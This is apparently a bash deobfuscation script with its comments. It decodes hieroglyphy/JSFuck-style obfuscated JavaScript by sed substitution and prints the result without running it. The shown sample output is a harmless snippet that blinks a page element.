character_8="($number_8+[])"
character_9="($number_9+[])"

# Expressions that coerce to the strings "[object Object]", "NaN", "true",
# "false" and "undefined"; letters are obtained by indexing into them.
_object_Object='[]+{}'
_NaN='+{}+[]'
_true='!![]+[]'
_false='![]+[]'
_undefined='[][[]]+[]'

# One entry per character: (source string)[index of that character].
character_blank="($_object_Object)[$number_7]"
character_leftsquarebracket="($_object_Object)[$number_0]"
character_rightsquarebracket="($_object_Object)[$character_1+$character_4]"
character_a="($_NaN)[$number_1]"
character_b="($_object_Object)[$number_2]"
character_c="($_object_Object)[$number_5]"
character_d="($_undefined)[$number_2]"
character_e="($_undefined)[$number_3]"
character_f="($_undefined)[$number_4]"
character_i="($_undefined)[$number_5]"
character_j="($_object_Object)[$number_3]"
character_l="($_false)[$number_2]"
character_n="($_undefined)[$number_1]"
character_o="($_object_Object)[$number_1]"
character_r="($_true)[$number_1]"
character_s="($_false)[$number_3]"
character_t="($_true)[$number_0]"
character_u="($_undefined)[$number_0]"
character_N="($_NaN)[$number_0]"
character_O="($_object_Object)[$number_8]"

# +("1e1000") overflows to Infinity; its text supplies "y" and "I".
_Infinity="+($number_1+$character_e+$character_1+$character_0+$character_0+$character_0)+[]"

character_y="($_Infinity)[$number_7]"
character_I="($_Infinity)[$number_0]"

# +("1e100") prints as "1e+100"; index 2 of that text is the "+" sign.
_1e100="+($number_1+$character_e+$character_1+$character_0+$character_0)+[]"
character_plus="($_1e100)[$number_2]"

# Replace each encoded expression in the working copy with the character it
# stands for. The order matters: the longer, composite expressions go first
# (characters before bare numbers, 9 before 1) because the shorter ones occur
# inside them as substrings and would otherwise break them up.
# NOTE(review): number_0 has no substitution of its own in this run.
sed -i "s/`escape $character_plus`/+/g" $ofile
sed -i "s/`escape $character_I`/I/g" $ofile
sed -i "s/`escape $character_y`/y/g" $ofile
sed -i "s/`escape $character_O`/O/g" $ofile
sed -i "s/`escape $character_N`/N/g" $ofile
sed -i "s/`escape $character_u`/u/g" $ofile
sed -i "s/`escape $character_t`/t/g" $ofile
sed -i "s/`escape $character_s`/s/g" $ofile
sed -i "s/`escape $character_r`/r/g" $ofile
sed -i "s/`escape $character_o`/o/g" $ofile
sed -i "s/`escape $character_n`/n/g" $ofile
sed -i "s/`escape $character_l`/l/g" $ofile
sed -i "s/`escape $character_j`/j/g" $ofile
sed -i "s/`escape $character_i`/i/g" $ofile
sed -i "s/`escape $character_f`/f/g" $ofile
sed -i "s/`escape $character_e`/e/g" $ofile
sed -i "s/`escape $character_d`/d/g" $ofile
sed -i "s/`escape $character_c`/c/g" $ofile
sed -i "s/`escape $character_b`/b/g" $ofile
sed -i "s/`escape $character_a`/a/g" $ofile
sed -i "s/`escape $character_rightsquarebracket`/]/g" $ofile
sed -i "s/`escape $character_leftsquarebracket`/[/g" $ofile
sed -i "s/`escape $character_blank`/ /g" $ofile
# Digits in their string form, highest first.
sed -i "s/`escape $character_9`/9/g" $ofile
sed -i "s/`escape $character_8`/8/g" $ofile
sed -i "s/`escape $character_7`/7/g" $ofile
sed -i "s/`escape $character_6`/6/g" $ofile
sed -i "s/`escape $character_5`/5/g" $ofile
sed -i "s/`escape $character_4`/4/g" $ofile
sed -i "s/`escape $character_3`/3/g" $ofile
sed -i "s/`escape $character_2`/2/g" $ofile
sed -i "s/`escape $character_1`/1/g" $ofile
sed -i "s/`escape $character_0`/0/g" $ofile
# Whatever bare numeric expressions are left, highest first.
sed -i "s/`escape $number_9`/9/g" $ofile
sed -i "s/`escape $number_8`/8/g" $ofile
sed -i "s/`escape $number_7`/7/g" $ofile
sed -i "s/`escape $number_6`/6/g" $ofile
sed -i "s/`escape $number_5`/5/g" $ofile
sed -i "s/`escape $number_4`/4/g" $ofile
sed -i "s/`escape $number_3`/3/g" $ofile
sed -i "s/`escape $number_2`/2/g" $ofile
sed -i "s/`escape $number_1`/1/g" $ofile

# Second pass. The patterns below are written in the half-decoded form the
# working copy has at this point: plain letters still joined by "+".

# [].sort.constructor is the Function constructor.
functionConstructor="[][s+o+r+t][c+o+n+s+t+r+u+c+t+o+r]"
# Function("return location")() coerced to text; "h", "p" and "/" are taken
# from indexes 0, 3 and 6 of that text.
returnLocation="([]+$functionConstructor(r+e+t+u+r+n+ +l+o+c+a+t+i+o+n)())"
character_h="$returnLocation[0]"
character_p="$returnLocation[3]"
character_slash="$returnLocation[6]"

sed -i "s/`escape $character_h`/h/g" $ofile
sed -i "s/`escape $character_p`/p/g" $ofile
# "\/" because "/" is the delimiter of the s/// command.
sed -i "s/`escape $character_slash`/\//g" $ofile

# Function("return unescape")() and Function("return escape")().
_unescape="$functionConstructor(r+e+t+u+r+n+ +u+n+e+s+c+a+p+e)()"
_escape="$functionConstructor(r+e+t+u+r+n+ +e+s+c+a+p+e)()"

# escape("[") is "%5B"; index 0 of that text is the "%" sign.
character_percentage="$_escape([)[+[]]"
sed -i "s/`escape $character_percentage`/%/g" $ofile

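# Decode the characters that are written as unescape("%XY"): try every byte
# from 0x20 to 0x7f and replace its call with the character itself.
# The second hex digit runs to "f"; stopping at "e" left %2f, %3f, %5f, ...
# undecoded.
for i in {2..7}; do
        for j in {0..9} {a..f}; do
                char=$(printf '%b' "\x$i$j")
                # "\", "&" and "/" are special on the replacement side of
                # s///: "&" would re-insert the matched text (a silent
                # no-op) and "/" would end the command early.
                case "$char" in
                '\' | '&' | '/') char="\\$char" ;;
                esac
                match="$_unescape(%+$i+$j)"
                # Quoted so the pattern is neither word-split nor
                # glob-expanded before it reaches escape.
                sed -i "s/$(escape "$match")/$char/g" "$ofile"
        done
done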

# Name the Function constructor. There is no "g" flag, so only the first
# occurrence on each line is rewritten.
sed -i "s/`escape $functionConstructor`/Function/" $ofile
# Drop every remaining "+", i.e. the concatenation operators between the
# decoded characters. This also removes any "+" that belonged to the decoded
# program, so the result is a reading aid, not an exact reconstruction.
sed -i "s/+//g" $ofile

# Show the decoded text; the script only prints it and never runs it.
cat $ofile
# ./dehieroglyphy source.js
Function(setInterval(function(){var a = document.getElementById('blinking');if (a.style.display == 'none') a.style.display = 'inline';else a.style.display = 'none';}, 500 );)()
References

https://github.com/alcuadrado/hieroglyphy/blob/master/hieroglyphy.js